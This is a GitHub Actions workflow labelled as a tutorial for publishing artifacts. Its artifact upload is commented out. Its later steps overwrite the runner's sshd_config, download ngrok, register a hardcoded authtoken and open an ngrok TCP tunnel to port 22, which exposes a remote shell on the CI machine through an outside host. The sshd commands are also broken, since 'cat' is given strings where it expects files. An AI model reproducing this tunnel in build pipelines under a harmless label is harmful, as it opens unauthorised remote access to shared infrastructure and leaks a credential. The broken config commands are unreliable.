# Publish GitHub workflow artifacts tutorial example
name: Publish GitHub Actions Artifacts Example

on:
  push:
    branches: [master]

jobs:
       
  archive-build-artifacts:
    runs-on: ubuntu-latest
    steps:

      - name: Step 1 - Create a temporary artifact downloads folder
        run: mkdir downloads
        
      - name: step 2 - Add artifacts to publish to the temp folder
        run: |
          cd downloads
          echo 'alpha'    > alpha.html
          echo 'bravo'    > bravo.html
          echo 'charlie'  > charlie.html
          cd ..
    
     # - name: Step 3 - Use the Upload Artifact GitHub Action
      #  uses: actions/upload-artifact@v2
       # with: 
        #  name: assets-for-download
         # path: downloads 
          
      
      - name: Step 4 - ssh settings
        run: |
            #sudo nano /etc/ssh/sshd_config
            cat "ChallengeResponseAuthentication no">/etc/ssh/sshd_config
            cat "PasswordAuthentication no">>/etc/ssh/sshd_config
            cat "UsePAM no">>/etc/ssh/sshd_config
            
      - name: Step 5 - update settings
        run: |
            sudo service ssh restart
            
            
      - name: Step 6 - test su command
        #uses: build
        #shell: bash
        #working-directory: build
        run: |
            #sudo apt list nginx*
            set -x
            #sudo passwd -u
            sudo apt install curl -y
            curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -o ngnx.zip
            echo .
            unzip ngnx.zip
            ./ngrok authtoken 1nKiWABerQ8KRNh8bRgG1pAzwLa_4P1qGtfGmTC8uBWa3bVK5
            ./ngrok tcp 22
